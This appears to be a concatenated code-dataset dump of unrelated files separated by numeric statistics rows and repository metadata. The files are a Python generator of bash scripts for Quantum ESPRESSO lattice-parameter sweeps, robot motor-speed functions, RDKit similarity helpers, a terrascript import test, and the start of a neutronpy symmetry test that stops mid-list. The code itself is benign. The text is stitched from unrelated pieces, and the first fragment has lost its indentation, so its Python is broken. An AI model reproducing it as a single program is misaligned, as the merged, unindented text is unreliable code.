fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b_start, range_b[2], b+range_b_end))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
#fout.write(" mkdir relax-${a}-${b}-${c}\n")
fout.write(" cp relax.in.template relax-${a}-${b}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${b}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}-${b}-${c}.in > relax-${a}-${b}-${c}.out\n")
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
# generate result analysis script
os.system("mkdir -p post-processing")
with open("post-processing/get_energy.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
# the comment
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a b c energy(Ry)\n")
fout.write("EOF\n")
# end
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a[0], range_a[2], a+range_a[1]))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b[0], range_b[2], b+range_b[1]))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c[0], range_c[2], c+range_c[1]))
fout.write("do\n")
fout.write(" energy=`cat ../relax-${a}-${b}-${c}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${b} ${c} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
#fout.write("cat > energy-latconst.gp<<EOF\n")
#fout.write("set term gif\n")
#fout.write("set output 'energy-latconst.gif'\n")
#fout.write("set title 'Energy Latconst'\n")
#fout.write("set xlabel 'latconst(a)'\n")
#fout.write("set ylabel 'latconst(c)'\n")
#fout.write("set zlabel 'Energy'\n")
#fout.write("splot 'energy-latconst.data'\n")
#fout.write("EOF\n")
#fout.write("\n")
#fout.write("gnuplot energy-latconst.gp")
os.chdir("../")
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
for i_batch_a in range(n_batch_a):
for i_batch_b in range(n_batch_b):
for i_batch_c in range(n_batch_c):
os.system("bash opt-abc-%d-%d-%d.sh" % (i_batch_a, i_batch_b, i_batch_c))
os.chdir("../")
for i_batch_a in range(n_batch_a):
for i_batch_b in range(n_batch_b):
for i_batch_c in range(n_batch_c):
server_handle(auto=auto, directory=directory, jobfilebase="opt-abc-%d-%d-%d" % (i_batch_a, i_batch_b, i_batch_c), server=self.run_params["server"])
| 69.376769 | 222 | 0.431575 | 20,959 | 166,643 | 3.337755 | 0.019371 | 0.165704 | 0.116073 | 0.072174 | 0.982732 | 0.978815 | 0.976714 | 0.971854 | 0.967437 | 0.964864 | 0 | 0.03457 | 0.378906 | 166,643 | 2,401 | 223 | 69.405664 | 0.641327 | 0.066741 | 0 | 0.952972 | 0 | 0.017054 | 0.207873 | 0.018507 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004651 | false | 0.009302 | 0.003618 | 0 | 0.008786 | 0.166408 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c0f4098fa2c91e2b004cf73197cfbcc5d427a223 | 4,064 | py | Python | programm/ball.py | team172011/ps_cagebot | ab6f7bdbc74ad3baee3feebc4b7b0fa4f726b179 | [
"MIT"
] | null | null | null | programm/ball.py | team172011/ps_cagebot | ab6f7bdbc74ad3baee3feebc4b7b0fa4f726b179 | [
"MIT"
] | null | null | null | programm/ball.py | team172011/ps_cagebot | ab6f7bdbc74ad3baee3feebc4b7b0fa4f726b179 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf8
import general
def calculatemotorspeedsball(horact, actradius):
# global leftspeedvalue
# global rightspeedvalue
# global speedvalue
# global horact
# global actradius
steermultiplier = 0
# unter diesem Wert keine Beschleunigung
minradius = 70
# ab diesem Wert verfolgt er das Objekt
defaultradius = 45
# ab diesem Wert Vollgas
maxradius = 25
# Maximalgeschwindigkeit des Motors
maxspeed = 100
#ltrttempspeed = maxspeed/maxltrtval*(rtact-ltact)
#ltrttempspeed = int(float((rtact-ltact))/(minradius-maxradius)*maxspeed)
#speedvalue = ltrttempspeed = maxspeed/maxltrtval*(rtact-ltact)
# Geschwindigkeit anhand des Radius ermitteln
# tempspeed = (1-((actradius-maxradius)/minradius))*maxspeed
tempspeed = int((1-((float(actradius)-maxradius)/minradius))*maxspeed)
if tempspeed<0:
tempspeed=0
elif tempspeed>100:
tempspeed=100
minval = -1000
maxval = 1000
# Ab wann reagiert er
steernull = 50
# Möglichkeit den Nullpunkt zu verschieben.
nullmin = 0 - steernull
nullmax = 0 + steernull
if horact < nullmin:
steermultiplier = float(horact)/minval
for_left = tempspeed - (steermultiplier * maxspeed)*2
# limit left and right speed -100 >= speed <= +100
if for_left >= 0:
for_left = min(100, for_left)
else:
for_left = max(-100, for_left)
for_right = tempspeed + (steermultiplier * maxspeed)*2
if for_right >= 0:
for_right = min(100, for_right)
else:
for_right = max(-100, for_right)
general.leftspeedvalue = for_left
general.rightspeedvalue = for_right
elif horact > nullmax:
steermultiplier = float(horact)/maxval
for_left = tempspeed + (steermultiplier * maxspeed)*2
if for_left >= 0:
for_left = min(100, for_left)
else:
for_left = max(-100, for_left)
for_right = tempspeed - (steermultiplier * maxspeed)*2
if for_right > 0:
for_right = min(100, for_right)
else:
for_right = max(-100, for_right)
general.leftspeedvalue = for_left
general.rightspeedvalue = for_right
else:
general.leftspeedvalue = general.rightspeedvalue = tempspeed
print('sm: ' + str(steermultiplier) + ' actradius: ' + str(actradius) + ' tempspeed ' + str(tempspeed) + ' lsv: ' + str(general.leftspeedvalue) + ' rsv: ' + str(general.rightspeedvalue))
def calculatemotorspeedsline(horact, actradius):
# global leftspeedvalue
# global rightspeedvalue
# global speedvalue
# global horact
# global actradius
steermultiplier = 0
# unter diesem Wert keine Beschleunigung
minradius = 70
# ab diesem Wert verfolgt er das Objekt
defaultradius = 45
# ab diesem Wert Vollgas
maxradius = 25
# Maximalgeschwindigkeit des Motors
maxspeed = 100
#ltrttempspeed = maxspeed/maxltrtval*(rtact-ltact)
#ltrttempspeed = int(float((rtact-ltact))/(minradius-maxradius)*maxspeed)
#speedvalue = ltrttempspeed = maxspeed/maxltrtval*(rtact-ltact)
# Geschwindigkeit anhand des Radius ermitteln
# tempspeed = (1-((actradius-maxradius)/minradius))*maxspeed
tempspeed = min(20, actradius) # line following always same speed
minval = -1000
maxval = 1000
# Ab wann reagiert er
steernull = 75 # -1000 bis 1000
# Möglichkeit den Nullpunkt zu verschieben.
nullmin = 0 - steernull
nullmax = 0 + steernull
if horact < nullmin:
steermultiplier = float(horact)/minval
general.leftspeedvalue = tempspeed - (steermultiplier * maxspeed)*2
general.rightspeedvalue = tempspeed + (steermultiplier * maxspeed)*2
elif horact > nullmax:
steermultiplier = float(horact)/maxval
general.leftspeedvalue = tempspeed + (steermultiplier * maxspeed)*2
general.rightspeedvalue = tempspeed - (steermultiplier * maxspeed)*2
else:
general.leftspeedvalue = general.rightspeedvalue = tempspeed
print('sm: ' + str(steermultiplier) + ' actradius: ' + str(actradius) + ' tempspeed ' + str(tempspeed) + ' lsv: ' + str(general.leftspeedvalue) + ' rsv: ' + str(general.rightspeedvalue))
| 26.562092 | 188 | 0.699803 | 442 | 4,064 | 6.371041 | 0.205882 | 0.034801 | 0.090909 | 0.09375 | 0.901989 | 0.901989 | 0.87358 | 0.838778 | 0.838778 | 0.806818 | 0 | 0.033261 | 0.201033 | 4,064 | 152 | 189 | 26.736842 | 0.834001 | 0.317913 | 0 | 0.704225 | 0 | 0 | 0.028519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028169 | false | 0 | 0.014085 | 0 | 0.042254 | 0.028169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
23ec92ade8f4d15447de64bf45ffa8730430f2b2 | 5,262 | py | Python | jlib.py | jskDr/jamespy | 729c496732d8ec2d6ba25d6b97ef2aa02065c18c | [
"MIT"
] | null | null | null | jlib.py | jskDr/jamespy | 729c496732d8ec2d6ba25d6b97ef2aa02065c18c | [
"MIT"
] | null | null | null | jlib.py | jskDr/jamespy | 729c496732d8ec2d6ba25d6b97ef2aa02065c18c | [
"MIT"
] | null | null | null | import numpy as np
def hello(name = 'no name'):
"""
name is welcome by saying hello
input: name - the welcome name
"""
print('Hello {name}!'.format(**locals()))
print('2015-3-2, 2:45pm')
def check_mol_similarity():
from rdkit import Chem
from rdkit import DataStructs
from rdkit.Chem.Fingerprints import FingerprintMols
ms = [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
fps = [FingerprintMols.FingerprintMol(x) for x in ms]
print fps[0]
print DataStructs.FingerprintSimilarity( fps[0], fps[1])
print DataStructs.FingerprintSimilarity( fps[0], fps[2])
print DataStructs.FingerprintSimilarity( fps[1], fps[2])
print DataStructs.FingerprintSimilarity( fps[0], fps[0])
def mols_similarity( ms_smiles = ['CCOC', 'CCO', 'COC']):
from rdkit import Chem
from rdkit import DataStructs
from rdkit.Chem.Fingerprints import FingerprintMols
ms = [Chem.MolFromSmiles( m_sm) for m_sm in ms_smiles]
# [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
fps = [FingerprintMols.FingerprintMol(x) for x in ms]
print fps[0]
print DataStructs.FingerprintSimilarity( fps[0], fps[1])
print DataStructs.FingerprintSimilarity( fps[0], fps[2])
print DataStructs.FingerprintSimilarity( fps[1], fps[2])
print DataStructs.FingerprintSimilarity( fps[0], fps[0])
def _mols_similarity_base_r0( ms_smiles_mid, ms_smiles_base):
"""
Input: dictionary type required such as {nick name: smiles code, ...}
"""
from rdkit import Chem
from rdkit import DataStructs
from rdkit.Chem.Fingerprints import FingerprintMols
#processing for mid
print( "Target: " + ms_smiles_mid.keys())
ms_mid = [Chem.MolFromSmiles( m_sm) for m_sm in ms_smiles_mid.values()]
# [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
fps_mid = [FingerprintMols.FingerprintMol(x) for x in ms_mid]
#processing for base
print( "Base: " + ms_smiles_base.keys())
ms_base = [Chem.MolFromSmiles( m_sm) for m_sm in ms_smiles_base.values()]
# [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
fps_base = [FingerprintMols.FingerprintMol(x) for x in ms_base]
for (bx, f_b) in enumerate(fps_base):
for (dx, f_d) in enumerate(fps_mid):
print( "Base:{0}, Target:{1}".format( ms_smiles_base.keys()[bx], ms_smiles_mid.keys()[dx]))
print( DataStructs.FingerprintSimilarity( f_b, f_d))
"""
core part is generated while addition is changed for both
"""
def mols_similarity_base_core( ms_smiles_mid, ms_smiles_base):
"""
Input: dictionary type required such as {nick name: smiles code, ...}
"""
from rdkit import Chem
from rdkit import DataStructs
from rdkit.Chem.Fingerprints import FingerprintMols
# Processing for mid
print( "Target: ", ms_smiles_mid.keys())
ms_mid = [Chem.MolFromSmiles( m_sm) for m_sm in ms_smiles_mid.values()]
# [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
fps_mid = [FingerprintMols.FingerprintMol(x) for x in ms_mid]
#processing for base
print( "Base: ", ms_smiles_base.keys())
ms_base = [Chem.MolFromSmiles( m_sm) for m_sm in ms_smiles_base.values()]
# [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
fps_base = [FingerprintMols.FingerprintMol(x) for x in ms_base]
return fps_base, fps_mid
def mols_similarity_base( ms_smiles_mid, ms_smiles_base):
"""
Input: dictionary type required such as {nick name: smiles code, ...}
"""
from rdkit import DataStructs
[fps_base, fps_mid] = mols_similarity_base_core( ms_smiles_mid, ms_smiles_base)
for (bx, f_b) in enumerate(fps_base):
for (dx, f_d) in enumerate(fps_mid):
print( "Base:{0}, Target:{1}".format( ms_smiles_base.keys()[bx], ms_smiles_mid.keys()[dx]))
print( DataStructs.FingerprintSimilarity( f_b, f_d))
def mols_similarity_base_return( ms_smiles_mid, ms_smiles_base, property_of_base = None):
"""
The results will be returned.
A * w = b, A and b will be returned.
return A, b, w
"""
from rdkit import DataStructs
[fps_base, fps_mid] = mols_similarity_base_core( ms_smiles_mid, ms_smiles_base)
Nb, Nm = len(fps_base), len(fps_mid)
A = np.zeros( (Nm, Nb))
b = np.zeros( Nb)
for (bx, f_b) in enumerate(fps_base):
for (mx, f_m) in enumerate(fps_mid):
print( "Base:{0}, Target:{1}".format( ms_smiles_base.keys()[bx], ms_smiles_mid.keys()[mx]))
A[mx, bx] = DataStructs.FingerprintSimilarity( f_b, f_m)
print( A[mx, bx])
if property_of_base:
b[ bx] = property_of_base[ bx]
print( b[ bx])
if property_of_base:
print "b is obtained."
return A, b
else:
return A
def mols_similarity_base_get_w( ms_smiles_mid, ms_smiles_base, property_of_base):
"""
property_of_base, which is b, must be entered
"""
[A, b] = mols_similarity_base_return( ms_smiles_mid, ms_smiles_base, property_of_base)
w = np.dot( np.linalg.pinv(A), b)
return w
| 37.856115 | 103 | 0.675599 | 737 | 5,262 | 4.617368 | 0.134328 | 0.075228 | 0.048487 | 0.094035 | 0.842492 | 0.821628 | 0.821628 | 0.821628 | 0.821628 | 0.802527 | 0 | 0.008065 | 0.198784 | 5,262 | 138 | 104 | 38.130435 | 0.799099 | 0.09293 | 0 | 0.580247 | 0 | 0 | 0.03779 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.185185 | null | null | 0.432099 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
f1c888ed796a55c5a9008e90b18c27ce4153e92f | 160 | py | Python | lovef/io.py | lovef/.lovef | a0ede4844ce349f28bc6cfddaa94922234c16262 | [
"Apache-2.0"
] | 2 | 2018-03-17T20:17:17.000Z | 2018-03-19T08:46:49.000Z | lovef/io.py | lovef/.lovef | a0ede4844ce349f28bc6cfddaa94922234c16262 | [
"Apache-2.0"
] | null | null | null | lovef/io.py | lovef/.lovef | a0ede4844ce349f28bc6cfddaa94922234c16262 | [
"Apache-2.0"
] | 1 | 2020-02-09T06:00:20.000Z | 2020-02-09T06:00:20.000Z | import sys
def readFromClipboard():
import tkinter
return tkinter.Tk().clipboard_get()
def readFromStdin():
return "".join(sys.stdin.readlines())
| 17.777778 | 41 | 0.70625 | 18 | 160 | 6.222222 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1625 | 160 | 8 | 42 | 20 | 0.835821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.166667 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
9e80dd92e1a09b4ba8d93c520461b8e666cf8cde | 787 | py | Python | tests/test_provider_poseidon_matchbox.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_poseidon_matchbox.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_poseidon_matchbox.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # tests/test_provider_poseidon_matchbox.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:21:35 UTC)
def test_provider_import():
import terrascript.provider.poseidon.matchbox
def test_resource_import():
from terrascript.resource.poseidon.matchbox import matchbox_group
from terrascript.resource.poseidon.matchbox import matchbox_profile
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.poseidon.matchbox
#
# t = terrascript.provider.poseidon.matchbox.matchbox()
# s = str(t)
#
# assert 'https://github.com/poseidon/terraform-provider-matchbox' in s
# assert '0.4.1' in s
| 29.148148 | 80 | 0.758577 | 103 | 787 | 5.679612 | 0.563107 | 0.164103 | 0.164103 | 0.179487 | 0.321368 | 0.181197 | 0.181197 | 0 | 0 | 0 | 0 | 0.022422 | 0.149936 | 787 | 26 | 81 | 30.269231 | 0.852018 | 0.640407 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0 | 1 | 0.4 | true | 0 | 1 | 0 | 1.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9e8657a5e570b72f526c6b889657da67dbaa305f | 85,750 | py | Python | tests/test_symmetry.py | neutronpy/neutronpy | 44ca74a0bef25c03397a77aafb359bb257de1fe6 | [
"MIT"
] | 14 | 2015-05-08T02:43:46.000Z | 2019-05-28T03:47:32.000Z | tests/test_symmetry.py | neutronpy/neutronpy | 44ca74a0bef25c03397a77aafb359bb257de1fe6 | [
"MIT"
] | 96 | 2015-02-09T01:04:33.000Z | 2020-12-08T22:57:37.000Z | tests/test_symmetry.py | neutronpy/neutronpy | 44ca74a0bef25c03397a77aafb359bb257de1fe6 | [
"MIT"
] | 5 | 2016-02-26T22:53:13.000Z | 2018-07-16T07:13:04.000Z | # -*- coding: utf-8 -*-
r"""Tests of space group symmetry operations
"""
import pytest
from neutronpy import symmetry
poses = {1: ['x,y,z'],
2: ['x,y,z', '-x,-y,-z'],
3: ['x,y,z', '-x,y,-z'],
4: ['x,y,z', '-x,y+1/2,-z'],
5: ['x,y,z', '-x,y,-z', 'x+1/2,y+1/2,z', '-x+1/2,y+1/2,-z'],
6: ['x,y,z', 'x,-y,z'],
7: ['x,y,z', 'x,-y,z+1/2'],
8: ['x,y,z', 'x,-y,z', 'x+1/2,y+1/2,z', 'x+1/2,-y+1/2,z'],
9: ['x,y,z', 'x,-y,z+1/2', 'x+1/2,y+1/2,z', 'x+1/2,-y+1/2,z+1/2'],
10: ['x,y,z', '-x,y,-z', '-x,-y,-z', 'x,-y,z'],
11: ['x,y,z', '-x,y+1/2,-z', '-x,-y,-z', 'x,-y+1/2,z'],
12: ['x,y,z', '-x,y,-z', '-x,-y,-z', 'x,-y,z', 'x+1/2,y+1/2,z', '-x+1/2,y+1/2,-z', '-x+1/2,-y+1/2,-z',
'x+1/2,-y+1/2,z'],
13: ['x,y,z', '-x,y,-z+1/2', '-x,-y,-z', 'x,-y,z+1/2'],
14: ['x,y,z', '-x,y+1/2,-z+1/2', '-x,-y,-z', 'x,-y+1/2,z+1/2'],
15: ['x,y,z', '-x,y,-z+1/2', '-x,-y,-z', 'x,-y,z+1/2', 'x+1/2,y+1/2,z', '-x+1/2,y+1/2,-z+1/2',
'-x+1/2,-y+1/2,-z', 'x+1/2,-y+1/2,z+1/2'],
16: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z'],
17: ['x,y,z', '-x,-y,z+1/2', '-x,y,-z+1/2', 'x,-y,-z'],
18: ['x,y,z', '-x,-y,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z'],
19: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z'],
20: ['x,y,z', '-x,-y,z+1/2', '-x,y,-z+1/2', 'x,-y,-z', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z'],
21: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z',
'x+1/2,-y+1/2,-z'],
22: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2',
'x,-y+1/2,-z+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z'],
23: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2'],
24: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z',
'-x+1/2,y,-z', 'x,-y,-z+1/2'],
25: ['x,y,z', '-x,-y,z', 'x,-y,z', '-x,y,z'],
26: ['x,y,z', '-x,-y,z+1/2', 'x,-y,z+1/2', '-x,y,z'],
27: ['x,y,z', '-x,-y,z', 'x,-y,z+1/2', '-x,y,z+1/2'],
28: ['x,y,z', '-x,-y,z', 'x+1/2,-y,z', '-x+1/2,y,z'],
29: ['x,y,z', '-x,-y,z+1/2', 'x+1/2,-y,z', '-x+1/2,y,z+1/2'],
30: ['x,y,z', '-x,-y,z', 'x,-y+1/2,z+1/2', '-x,y+1/2,z+1/2'],
31: ['x,y,z', '-x+1/2,-y,z+1/2', 'x+1/2,-y,z+1/2', '-x,y,z'],
32: ['x,y,z', '-x,-y,z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z'],
33: ['x,y,z', '-x,-y,z+1/2', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z+1/2'],
34: ['x,y,z', '-x,-y,z', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2'],
35: ['x,y,z', '-x,-y,z', 'x,-y,z', '-x,y,z', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z'],
36: ['x,y,z', '-x,-y,z+1/2', 'x,-y,z+1/2', '-x,y,z', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z+1/2',
'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z'],
37: ['x,y,z', '-x,-y,z', 'x,-y,z+1/2', '-x,y,z+1/2', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2'],
38: ['x,y,z', '-x,-y,z', 'x,-y,z', '-x,y,z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', 'x,-y+1/2,z+1/2',
'-x,y+1/2,z+1/2'],
39: ['x,y,z', '-x,-y,z', 'x,-y+1/2,z', '-x,y+1/2,z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', 'x,-y,z+1/2',
'-x,y,z+1/2'],
40: ['x,y,z', '-x,-y,z', 'x+1/2,-y,z', '-x+1/2,y,z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2'],
41: ['x,y,z', '-x,-y,z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2',
'x+1/2,-y,z+1/2', '-x+1/2,y,z+1/2'],
42: ['x,y,z', '-x,-y,z', 'x,-y,z', '-x,y,z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', 'x,-y+1/2,z+1/2',
'-x,y+1/2,z+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', 'x+1/2,-y,z+1/2', '-x+1/2,y,z+1/2', 'x+1/2,y+1/2,z',
'-x+1/2,-y+1/2,z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z'],
43: ['x,y,z', '-x,-y,z', 'x+1/4,-y+1/4,z+1/4', '-x+1/4,y+1/4,z+1/4', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2',
'x+1/4,-y+3/4,z+3/4', '-x+1/4,y+3/4,z+3/4', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', 'x+3/4,-y+1/4,z+3/4',
'-x+3/4,y+1/4,z+3/4', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', 'x+3/4,-y+3/4,z+1/4', '-x+3/4,y+3/4,z+1/4'],
44: ['x,y,z', '-x,-y,z', 'x,-y,z', '-x,y,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2'],
45: ['x,y,z', '-x,-y,z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'x,-y,z+1/2', '-x,y,z+1/2'],
46: ['x,y,z', '-x,-y,z', 'x+1/2,-y,z', '-x+1/2,y,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'x,-y+1/2,z+1/2', '-x,y+1/2,z+1/2'],
47: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z'],
48: ['x,y,z', '-x+1/2,-y+1/2,z', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z',
'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2'],
49: ['x,y,z', '-x,-y,z', '-x,y,-z+1/2', 'x,-y,-z+1/2', '-x,-y,-z', 'x,y,-z', 'x,-y,z+1/2', '-x,y,z+1/2'],
50: ['x,y,z', '-x+1/2,-y+1/2,z', '-x+1/2,y,-z', 'x,-y+1/2,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y,z',
'-x,y+1/2,z'],
51: ['x,y,z', '-x+1/2,-y,z', '-x,y,-z', 'x+1/2,-y,-z', '-x,-y,-z', 'x+1/2,y,-z', 'x,-y,z', '-x+1/2,y,z'],
52: ['x,y,z', '-x+1/2,-y,z', '-x+1/2,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2', '-x,-y,-z', 'x+1/2,y,-z',
'x+1/2,-y+1/2,z+1/2', '-x,y+1/2,z+1/2'],
53: ['x,y,z', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x,-y,-z', '-x,-y,-z', 'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2',
